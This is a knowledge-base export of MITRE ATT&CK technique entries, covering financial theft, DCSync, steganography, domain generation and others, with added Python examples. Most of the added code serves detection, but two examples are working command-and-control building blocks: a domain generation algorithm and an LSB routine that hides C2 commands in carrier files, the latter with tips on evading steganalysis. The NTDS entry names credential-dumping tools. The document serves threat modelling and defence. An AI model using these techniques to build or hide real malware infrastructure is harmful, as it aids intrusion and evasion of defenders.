Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) "pig butchering,"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin)

Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)

Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)

Because financial theft can have an immense business impact, an adversary may also feign a financial motive, appearing to seek monetary gain, in order to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)

The tag is: misp-galaxy:mitre-attack-pattern="Financial Theft - T1657"

Table 6330. Table References

Links

https://apnews.com/article/russia-ukraine-technology-business-europe-hacking-ce7a8aca506742ab8e8873e7f9f229c2

https://attack.mitre.org/techniques/T1657

https://www.bbc.com/news/technology-60933174

https://www.cisa.gov/sites/default/files/Ransomware_Trifold_e-version.pdf

https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/

https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-real-estate-wire-fraud-111422.pdf/view

https://www.ic3.gov/Media/PDF/AnnualReport/2022_IC3Report.pdf

https://www.justice.gov/usao-cdca/pr/3-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyber-attacks-and

https://www.mandiant.com/resources/blog/ransomware-extortion-ot-docs

https://www.nytimes.com/2021/05/13/technology/colonial-pipeline-ransom.html

https://www.wired.com/story/pig-butchering-fbi-ic3-2022-report/

Compromise Accounts - T1586

Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development; this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586"

Table 6331. Table References

Links

https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/

https://attack.mitre.org/techniques/T1586

https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/

Dynamic Resolution - T1568

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware’s communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server, malware may employ dynamic resolution as a means of reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
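
The "shared algorithm" idea above, as an added example that is not part of the MISP galaxy or the ATT&CK entry: a hypothetical date-seeded domain generation algorithm (SHA-256 over date, secret and index, encoded as 12 base-26 letters; the construction is this example's own, not any named family's), together with the two defender-side uses of it. Once the algorithm and secret are recovered from a sample, the candidate list can be precomputed and matched exactly against DNS logs or sinkholed; before that, a lexical heuristic on query names gives a noisier signal. The seed date, secret, DNS log lines and thresholds are all constructed for the example.

```python
import hashlib
import math
from collections import Counter
from datetime import date

TLDS = ["com", "net", "org", "info"]
VOWELS = set("aeiou")

def generate_dga_domains(seed_date: date, secret: bytes, count: int = 10) -> list:
    """Hypothetical DGA: derive 'count' candidate C2 domains from the current date and
    a secret compiled into the malware. The operator runs the same function to know
    which domain to register that day; a defender who recovers the secret can too."""
    domains = []
    for i in range(count):
        material = seed_date.isoformat().encode() + secret + bytes([i])
        digest = hashlib.sha256(material).digest()
        n = int.from_bytes(digest[:8], "big")
        label = ""
        for _ in range(12):                      # 12 base-26 letters
            label += chr(ord("a") + n % 26)
            n //= 26
        domains.append(f"{label}.{TLDS[digest[8] % len(TLDS)]}")
    return domains

def match_dns_log(log_lines, candidate_domains):
    """High-precision detection once the algorithm is known: exact match against the
    precomputed candidates. log_lines are 'client qname' pairs."""
    wanted = {d.lower() for d in candidate_domains}
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        client, qname = parts[0], parts[1].lower().rstrip(".")
        if qname in wanted:
            hits.append((client, qname))
    return hits

def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def longest_consonant_run(s: str) -> int:
    best = run = 0
    for ch in s:
        run = 0 if ch in VOWELS else run + 1
        best = max(best, run)
    return best

def lexical_dga_score(domain: str) -> int:
    """Algorithm-agnostic heuristic (0-4) on the second-level label: long, high-entropy,
    vowel-poor labels with long consonant runs look machine-made. Thresholds are
    illustrative; tune them against your own DNS baseline and expect false positives
    on CDN and hash-like hostnames."""
    parts = domain.lower().rstrip(".").split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    if not label:
        return 0
    score = int(len(label) >= 10)
    score += int(shannon_entropy(label) >= 3.2)
    score += int(sum(ch in VOWELS for ch in label) / len(label) < 0.3)
    score += int(longest_consonant_run(label) >= 4)
    return score

# Constructed inputs for the example.
EXAMPLE_DATE = date(2024, 3, 1)
EXAMPLE_SECRET = b"example-shared-secret"
EXAMPLE_DOMAINS = generate_dga_domains(EXAMPLE_DATE, EXAMPLE_SECRET)
SAMPLE_DNS_LOG = [
    "10.1.1.4 www.example.com",
    "10.1.1.4 " + EXAMPLE_DOMAINS[3] + ".",
    "10.1.1.7 cdn.example.net",
]

if __name__ == "__main__":
    print(match_dns_log(SAMPLE_DNS_LOG, EXAMPLE_DOMAINS))
    for d in EXAMPLE_DOMAINS + ["google.com", "xkqvwrtzplmn.com"]:
        print(lexical_dga_score(d), d)
```

The exact-match path is the one to operationalise: generate the list for today and a few days either side (clock skew in the malware), push it to the resolver blocklist or sinkhole, and alert on any client that queries it. The lexical score is for triage only.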

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568"

Table 6332. Table References

Links

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

https://attack.mitre.org/techniques/T1568

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html

https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/

Content Injection - T1659

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)

Adversaries may inject content to victim systems in various ways, including:

  • From the middle, where the adversary is in-between legitimate online client-server communications (Note: this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)

  • From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)

Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)

The tag is: misp-galaxy:mitre-attack-pattern="Content Injection - T1659"

Table 6333. Table References

Links

https://attack.mitre.org/techniques/T1659

https://encyclopedia.kaspersky.com/glossary/man-in-the-middle-attack/

https://usa.kaspersky.com/blog/man-on-the-side/27854/

https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

System Services - T1569

Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.

The tag is: misp-galaxy:mitre-attack-pattern="System Services - T1569"

Table 6334. Table References

Links

https://attack.mitre.org/techniques/T1569

Develop Capabilities - T1587

Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary’s development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

The tag is: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587"

Table 6335. Table References

Links

https://attack.mitre.org/techniques/T1587

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Obtain Capabilities - T1588

Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.

In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)

In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588"

Table 6336. Table References

Links

https://attack.mitre.org/techniques/T1588

https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/

https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop

https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html

https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/

https://www.recordedfuture.com/cobalt-strike-servers/

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Adversary-in-the-Middle - T1638

Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642).

[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic.

Outside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning.

If applications properly encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.

The tag is: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1638"

Table 6337. Table References

Links

https://attack.mitre.org/techniques/T1638

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-8.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-12.html

Adversary-in-the-Middle - T1557

Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or replay attacks ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)

For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.(Citation: ttint_rat)(Citation: dns_changer_trojans)(Citation: ad_blocker_with_miner) Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials and session cookies.(Citation: volexity_0day_sophos_FW) [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.(Citation: mitm_tls_downgrade_att)(Citation: taxonomy_downgrade_att_tls)(Citation: tlseminar_downgrade_att)

Adversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://attack.mitre.org/techniques/T1562) and/or in support of a [Network Denial of Service](https://attack.mitre.org/techniques/T1498).

The tag is: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557"

Table 6338. Table References

Links

https://arxiv.org/abs/1809.05681

https://attack.mitre.org/techniques/T1557

https://blog.netlab.360.com/ttint-an-iot-remote-control-trojan-spread-through-2-0-day-vulnerabilities/

https://securelist.com/ad-blocker-with-miner-included/101105/

https://tlseminar.github.io/downgrade-attacks/

https://www.praetorian.com/blog/man-in-the-middle-tls-ssl-protocol-downgrade-attack/

https://www.rapid7.com/fundamentals/man-in-the-middle-attacks/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Add-ins - T1137.006

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)

Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.

The tag is: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006"

Table 6339. Table References

Links

https://attack.mitre.org/techniques/T1137/006

https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf

https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460

https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique

Regsvcs/Regasm - T1218.009

Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)

Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: <code>[ComRegisterFunction]</code> or <code>[ComUnregisterFunction]</code> respectively. The code carrying the registration and unregistration attributes is executed even if the process runs with insufficient privileges and the registration itself fails. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)

The tag is: misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009"

Table 6340. Table References

Links

https://attack.mitre.org/techniques/T1218/009

https://lolbas-project.github.io/lolbas/Binaries/Regasm/

https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/

https://msdn.microsoft.com/en-us/library/04za0hca.aspx

https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx

Steganography - T1001.002

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.
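
The "files embedded using steganography" case above, as an added example that is not part of the MISP galaxy or the ATT&CK entry: least-significant-bit embedding, the simplest scheme used for this purpose. One payload bit replaces the low bit of each cover sample, so no sample changes by more than 1 and the carrier looks untouched, while a 4-byte length header lets the receiver know how much to read back. The cover here is a constructed byte gradient standing in for 8-bit image samples, and the embedded C2 command is invented; with a real image you would apply the same functions to the decoded pixel bytes.

```python
import json

HEADER_BYTES = 4  # big-endian payload length, stored in the first 32 cover bytes

def lsb_capacity(cover: bytes) -> int:
    """Payload bytes that fit: one bit per cover byte, minus the length header."""
    return len(cover) // 8 - HEADER_BYTES

def embed_lsb(cover: bytes, payload: bytes) -> bytes:
    """Replace the least significant bit of successive cover bytes with the payload bits.
    Each cover byte changes by at most 1, which is invisible in an 8-bit sample."""
    if len(payload) > lsb_capacity(cover):
        raise ValueError("cover too small for payload")
    data = len(payload).to_bytes(HEADER_BYTES, "big") + payload
    bits = "".join(f"{b:08b}" for b in data)
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | int(bit)
    return bytes(out)

def extract_lsb(stego: bytes) -> bytes:
    """Read the length header, then that many bytes, from the low bits of the carrier."""
    def read(offset_bytes: int, n: int) -> bytes:
        if n == 0:
            return b""
        bits = "".join(str(stego[i] & 1) for i in range(offset_bytes * 8, (offset_bytes + n) * 8))
        return int(bits, 2).to_bytes(n, "big")
    length = int.from_bytes(read(0, HEADER_BYTES), "big")
    return read(HEADER_BYTES, length)

def encode_command(cmd: dict) -> bytes:
    return json.dumps(cmd, separators=(",", ":")).encode()

def decode_command(blob: bytes) -> dict:
    return json.loads(blob.decode())

# Constructed cover: 4096 8-bit samples of a synthetic gradient standing in for pixels.
COVER = bytes((i * 7) % 256 for i in range(4096))
COMMAND = {"cmd": "sleep", "seconds": 60}   # invented C2 tasking for the example

def roundtrip() -> dict:
    """Embed a command, confirm the carrier is the same size and barely altered, extract it."""
    stego = embed_lsb(COVER, encode_command(COMMAND))
    assert len(stego) == len(COVER)
    assert max(abs(a - b) for a, b in zip(stego, COVER)) <= 1   # distortion bound
    return decode_command(extract_lsb(stego))

if __name__ == "__main__":
    print(roundtrip())
```

Two practitioner notes: the payload is unencrypted here, so a real implant would encrypt it first (the low bits of a natural image are not uniformly random, and plain LSB embedding is exactly what chi-square and sample-pair steganalysis detect); and any lossy re-encoding of the carrier (JPEG recompression by a CDN or mail gateway) destroys the hidden bits, which is why adversaries favour lossless formats or transform-domain schemes for this.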

The tag is: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002"

Table 6341. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1001/002

NTDS - T1003.003

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)

In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)

The following tools and techniques can be used to obtain a copy of the NTDS file and extract the password hashes of the entire Active Directory from it.

  • Volume Shadow Copy

  • secretsdump.py

  • Using the in-built Windows tool, ntdsutil.exe

  • Invoke-NinjaCopy

The tag is: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003"

Table 6342. Table References

Links

http://adsecurity.org/?p=1275

https://attack.mitre.org/techniques/T1003/003

https://en.wikipedia.org/wiki/Active_Directory

DCSync - T1003.006

Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller’s application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account’s password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)

DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
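
A detection for the replication abuse described above, as an added example that is not part of the MISP galaxy or the ATT&CK entry. When auditing of directory service access is enabled, a DCSync request produces Security event 4662 whose Properties field lists the control access rights exercised; the three replication-right GUIDs below are the schema-defined values for DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set. Legitimate replication comes from domain controller machine accounts and from a small set of directory-sync service accounts, so anything else exercising those rights is worth an alert. The sample events are constructed (their shape follows 4662's EventData fields; the names are invented), and the DC and allowlist inputs are assumptions a deployment would supply.

```python
# Control access right GUIDs (from the AD schema) that appear in the Properties
# field of Security event 4662 when a caller requests directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

def detect_dcsync(events, domain_controllers, allowlist=()):
    """events: iterable of dicts carrying the fields of a parsed Security 4662 event.
    domain_controllers: hostnames whose machine accounts replicate legitimately.
    allowlist: service accounts that replicate by design (e.g. a directory-sync account).
    Returns [(subject, [right names])] for every other caller that exercised a
    replication right. Get-Changes-All is the one that returns secrets, so rank
    alerts that include it highest."""
    dc_accounts = {name.upper().rstrip("$") + "$" for name in domain_controllers}
    allowed = {a.lower() for a in allowlist}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = ev.get("Properties", "").lower()
        matched = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if not matched:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in dc_accounts or subject.lower() in allowed:
            continue
        alerts.append((subject, matched))
    return alerts

# Constructed sample events. ObjectType holds the schema class GUID of the object
# accessed (domainDNS for a replication request); values other than GUIDs are invented.
DOMAIN_DNS_CLASS = "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}"
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
     "ObjectType": DOMAIN_DNS_CLASS,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "ObjectType": DOMAIN_DNS_CLASS,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc_dirsync", "SubjectDomainName": "CORP",
     "ObjectType": DOMAIN_DNS_CLASS,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "jdoe", "SubjectDomainName": "CORP"},
]

if __name__ == "__main__":
    for subject, rights in detect_dcsync(SAMPLE_EVENTS, ["DC01", "DC02"], allowlist=["svc_dirsync"]):
        print(f"DCSync-like replication by {subject}: {', '.join(rights)}")
```

Two caveats: 4662 only appears if the domain controllers' SACL on the domain object audits these rights and "Audit Directory Service Access" is enabled, and 4662 carries no client address, so correlate the subject with the preceding 4624 logon on the same DC to find the source host.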

The tag is: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006"

Table 6343. Table References

Links

http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/

https://adsecurity.org/?p=1729

https://attack.mitre.org/techniques/T1003/006

https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM

https://github.com/gentilkiwi/mimikatz/wiki/module--lsadump

https://msdn.microsoft.com/library/cc228086.aspx

https://msdn.microsoft.com/library/cc237008.aspx

https://msdn.microsoft.com/library/cc245496.aspx

https://msdn.microsoft.com/library/dd207691.aspx

https://source.winehq.org/WineAPI/samlib.html

https://wiki.samba.org/index.php/DRSUAPI

Timestomp - T1070.006

Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.

Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)

The tag is: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006"

Table 6344. Table References

Links

http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html

https://attack.mitre.org/techniques/T1070/006

SSH - T1021.004

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to log in as that user.

The tag is: misp-galaxy:mitre-attack-pattern="SSH - T1021.004"

Table 6345. Table References

Links

https://attack.mitre.org/techniques/T1021/004

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

VNC - T1021.005

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)

VNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system’s authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)

